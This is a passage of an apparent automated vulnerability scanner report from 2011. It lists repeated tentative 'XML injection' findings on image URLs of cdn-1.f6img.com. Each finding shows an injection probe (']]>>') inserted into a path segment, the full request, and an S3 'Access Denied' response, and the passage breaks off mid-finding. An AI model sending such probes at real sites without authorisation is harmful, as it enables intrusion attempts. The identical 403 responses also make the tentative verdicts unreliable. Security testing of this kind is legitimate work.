Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>102A6EC9CAC96E3B</RequestId><HostId>HmucvidHyY5ushXsS4NiRudCuTKdffLZrK7yr6qS4d+iHGXXiJ
...[SNIP]...

8.67. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 010973A1895BEAF2
x-amz-id-2: HpuosBrBtWSSXrPDtxfu2+54bzf26LAze+FbckOPNQvB5zReamkOtlFureZrm0G0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4c48a7fac10bcbc5c766813da4652fe5625aa1f5b1ab0bddfef7f77072e475e86fc2cb72bf54e9ef
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>010973A1895BEAF2</RequestId><HostId>HpuosBrBtWSSXrPDtxfu2+54bzf26LAze+FbckOPNQvB5zReam
...[SNIP]...

8.68. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A4F6E3B38035BCCE
x-amz-id-2: AGtnLFN3nwFcFN70x2tK0VNzfpzd0jwKmB9XCYHD6ImEvGBh+iSoMDHT0TvPePgw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 27c7bbe3b92278238b6ac74a01899a7d6acb45bb2b4f85a8e5fd1ba8fb583f54f3dc3dac34273d41
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A4F6E3B38035BCCE</RequestId><HostId>AGtnLFN3nwFcFN70x2tK0VNzfpzd0jwKmB9XCYHD6ImEvGBh+i
...[SNIP]...

8.69. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F2336139DD00BAE
x-amz-id-2: H0z/uZxdfL/VZyRXbSUTsInE5zPXQYTpMj8+ZtsTLJGJBVYoZRIGzrjHS0tf4XqD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 83f86af8884bc81fc5641826c9968a004cbb4794518bcc78f5f6aa586fc25310dc32d65d8011ee6f
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F2336139DD00BAE</RequestId><HostId>H0z/uZxdfL/VZyRXbSUTsInE5zPXQYTpMj8+ZtsTLJGJBVYoZR
...[SNIP]...

8.70. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6400300F2AD43B5
x-amz-id-2: O+AQMbgBn9swZHUsU7N+sX2VNfp3kCvBuHBPhqEhdX+3RvyKFxzJM3ZpBh4SXgyi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5f22d6b79c37eb5e835226fc9bd38587e49df52ae488cbf64d699a7cd2755d9f28700d4f2adf05c1
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6400300F2AD43B5</RequestId><HostId>O+AQMbgBn9swZHUsU7N+sX2VNfp3kCvBuHBPhqEhdX+3RvyKFx
...[SNIP]...

8.71. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8027425533BC406E
x-amz-id-2: RWTrlCOHgJBRcgajt4ZOyb7k/dwwEd4FJ+j+MTNQDKRwnbL77uYgwb47Ue18wi+R
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 853e3d4d0711b1f971a1db3debe65bfda07f9da5a7dd45b5990d93a4d038bb8d7d1fc7cb938b7382
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8027425533BC406E</RequestId><HostId>RWTrlCOHgJBRcgajt4ZOyb7k/dwwEd4FJ+j+MTNQDKRwnbL77u
...[SNIP]...

8.72. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DA8AB8E77A5BCB0C
x-amz-id-2: VRco0vO+vBzrBYqIC5Uc3ATwXs4nofMkb3DmwVzgYZgMjciReftTP82mKMaXK8/c
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fa1feb0ee24144134d1fd14d80cf0837447d8e3760d52a885d29b743e926a85fd2558d9c0a12cc7f
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DA8AB8E77A5BCB0C</RequestId><HostId>VRco0vO+vBzrBYqIC5Uc3ATwXs4nofMkb3DmwVzgYZgMjciRef
...[SNIP]...

8.73. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 73FFA757180C7BB2
x-amz-id-2: ibM3a8fPDlQOxzTZRnQUs0Qan2w5EpLvn7VVclEX0XZUmaKOQaie8ku1WPnoX7PL
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7509039ce96282bd93584583a6c62212ffc1ce3e77068a44899b228032cc7b72d4d7f5381de972e0
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>73FFA757180C7BB2</RequestId><HostId>ibM3a8fPDlQOxzTZRnQUs0Qan2w5EpLvn7VVclEX0XZUmaKOQa
...[SNIP]...

8.74. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E96194E7E0A71EC
x-amz-id-2: /xOLdFPAZASXrJj5A6VVGGxV+4QDFbnUQtv8fKDWlyZEGCFKc0yj2v6XwjkABzY7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: adb02de788cb5067ac54225c4e53cfc88fc1c8f9223a266e970dd2097d02da7a1380f76f5a68fd21
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E96194E7E0A71EC</RequestId><HostId>/xOLdFPAZASXrJj5A6VVGGxV+4QDFbnUQtv8fKDWlyZEGCFKc0
...[SNIP]...

8.75. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DBA51DD1B0F8B299
x-amz-id-2: pZdMj1PXiGqsqTC9yoO2nCegNfUF56vvjg3vkdvH44M6c8J01NAOh7VRS1SGIM0x
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d3a6514a00713df655c419499e6ed75363766cd17298d2c2698e0a24f74e2ec2631ce7c859dd55e2
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DBA51DD1B0F8B299</RequestId><HostId>pZdMj1PXiGqsqTC9yoO2nCegNfUF56vvjg3vkdvH44M6c8J01N
...[SNIP]...

8.76. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 46517C30218A5201
x-amz-id-2: 65bf+hQaTdmvGmaAPq8sYjJSp5LnhewLogyfx9sTge7zkBs32sU0LX0QQhEPROpC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7e2921db1b0e89887724e104416227136392873881bfd55bf2b51f8c494d31fc75965a7620db84f9
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>46517C30218A5201</RequestId><HostId>65bf+hQaTdmvGmaAPq8sYjJSp5LnhewLogyfx9sTge7zkBs32s
...[SNIP]...

8.77. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 66EAB228C38AF5A7
x-amz-id-2: xMMrH8jnd77GUeyQOBv3hIPiJmYeM8QK3HyaIvxWnga1dxJzyeF8ieB6bJd2QdLg
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60d4d17a610893d278af31d8a528017145e9387f6582833b7f8a71e05eeb7e72581cc9b73f1dfa3f
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>66EAB228C38AF5A7</RequestId><HostId>xMMrH8jnd77GUeyQOBv3hIPiJmYeM8QK3HyaIvxWnga1dxJzye
...[SNIP]...

8.78. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0DD7A862E58B1C81
x-amz-id-2: d8uJCuwU0bu6+4jhc8PtnKMTaGSkanPpZRlOeDjoQfkKvKjIMiT1t6eDKOyjbo6h
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 32ec464cb8d8d580ac0f593ce1eb7d555a4685f97a2c9e738bc673c91f1c13387a7587a40db7e7d1
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0DD7A862E58B1C81</RequestId><HostId>d8uJCuwU0bu6+4jhc8PtnKMTaGSkanPpZRlOeDjoQfkKvKjIMi
...[SNIP]...

8.79. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E05D600F33B4ACED
x-amz-id-2: jyrzateb32FWQ+zrVTSeol1SGDNxRaKYmv6Q6/oREyI5PspwSGYOGBs1Tvrl3EpB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60eb0d9a2107c7fbf96dcae1b668b28a317a609e19ae13c1dc59691d268c9f57c48e1c2fe5659d49
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E05D600F33B4ACED</RequestId><HostId>jyrzateb32FWQ+zrVTSeol1SGDNxRaKYmv6Q6/oREyI5PspwSG
...[SNIP]...

8.80. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

